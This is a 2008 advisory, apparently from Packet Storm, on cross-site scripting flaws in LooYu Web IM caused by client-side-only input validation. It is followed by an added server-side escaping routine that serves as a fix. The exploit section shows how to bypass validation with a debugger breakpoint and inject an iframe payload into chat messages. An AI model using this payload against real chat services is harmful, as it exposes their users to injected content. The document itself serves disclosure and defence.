looyu-xss.txt

19 Sep 2008. Reported by xisigr. Source: packetstorm (packetstormsecurity.com).
LooYu Web IM 2008 XSS Vulnerabilities

```text
Application: LooYu Web IM
Vendor: www.looyu.com
Corporation: DuoYou, Inc.
Version: Latest: (19 SEP 2008) - Home Edition, Enterprise & Professional
Description: LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities

Background:
==============
LooYu is a web-based group chat tool that lets you invite a client,
colleague, or vendor to chat and collaborate.

Vulnerability:
==============
The application does not properly sanitize potentially malicious input
before it is rendered and, as a result, an attacker can supply HTML
content as part of an IM message. Input validation is performed on the
client side only.

Exploit:
==============
1. newVisitorChat.js

(1) function sendMessage() {
    ..................
    ..................
    save_message(replaceHtml(msg));
}

(2) function save_message(msg) {
    var m = msg; //BREAKPOINT
    for (var e in emots) {
        if (m.indexOf(e) != -1) {
            m = m.replace(e, emots[e]);
        }
    }
    addMsg_chat(m, "you"/*getShortId(visitorId)*/, "visitor", null, 'send');
    ..................
    ..................
}
SET BREAKPOINT (firebug, etc), AND SET NEW VALUE:
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"


2. newCusChat.js

(1) function sendMessage() {
    ..................
    ..................
    save_message(replaceHtml(msg));
    ..................
    ..................
}

(2) function saveMessage(msg) {
    showLocalMessage(msg);
    Chat.addMessage(companyId, currentVisitor.chatId, customerId, currentVisitor.getTar(),
        msg, {callback: function(m) {
            save_message_do(currentVisitor, m); //BREAKPOINT
        }});
}
SET BREAKPOINT (firebug, etc), AND SET NEW VALUE:
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"

=========================
xisigr[topsec]
[email protected]



--
----xisigr----
```
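The advisory's root cause is that `replaceHtml()` runs only in the browser, where a debugger breakpoint can swap in raw HTML after validation has already happened, and that `save_message()` then turns emoticon shortcodes into markup on the same string. The following is an added example, not LooYu's code, showing how a server should handle the same message: escape the untrusted text first, then substitute emoticons from a trusted table. The names `escapeHtml`, `renderMessage` and the `EMOTS` table are assumptions for illustration; the real emoticon table is not on the page.

```javascript
// Added example (not from the LooYu product): server-side rendering of an
// IM message so that client-side validation is no longer the only defence.

// Assumed emoticon table (shortcode -> trusted markup), modelled on the
// `emots` object used in the advisory's save_message(). Constructed values.
const EMOTS = {
  ":)": '<img src="/emots/smile.gif" alt=":)">',
  ":(": '<img src="/emots/sad.gif" alt=":(">',
  "<3": '<img src="/emots/heart.gif" alt="&lt;3">',
};

// Escape every character that can open or close HTML markup or an attribute.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Render a message received from the client as untrusted text.
// Order matters: the user's text is escaped before any emoticon lookup, so
// the only tags that can reach the page come from EMOTS, never from `msg`.
// Doing it the other way round (replace, then escape) would mangle the
// trusted <img> tags; doing it only on the client, as in the advisory, can be
// bypassed by editing the variable in a debugger.
function renderMessage(msg) {
  let out = escapeHtml(msg);
  for (const code of Object.keys(EMOTS)) {
    // The shortcode itself may contain '<' (e.g. "<3"), so look it up in
    // its escaped form, matching what escapeHtml() produced.
    out = out.split(escapeHtml(code)).join(EMOTS[code]);
  }
  return out;
}

// True if the rendered output contains no markup beyond the trusted table.
function onlyTrustedMarkup(rendered) {
  let stripped = rendered;
  for (const code of Object.keys(EMOTS)) {
    stripped = stripped.split(EMOTS[code]).join("");
  }
  return !/[<>]/.test(stripped);
}
```

Feeding the advisory's iframe payload through `renderMessage()` yields inert text, while a message such as `hi :)` still gets its emoticon.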
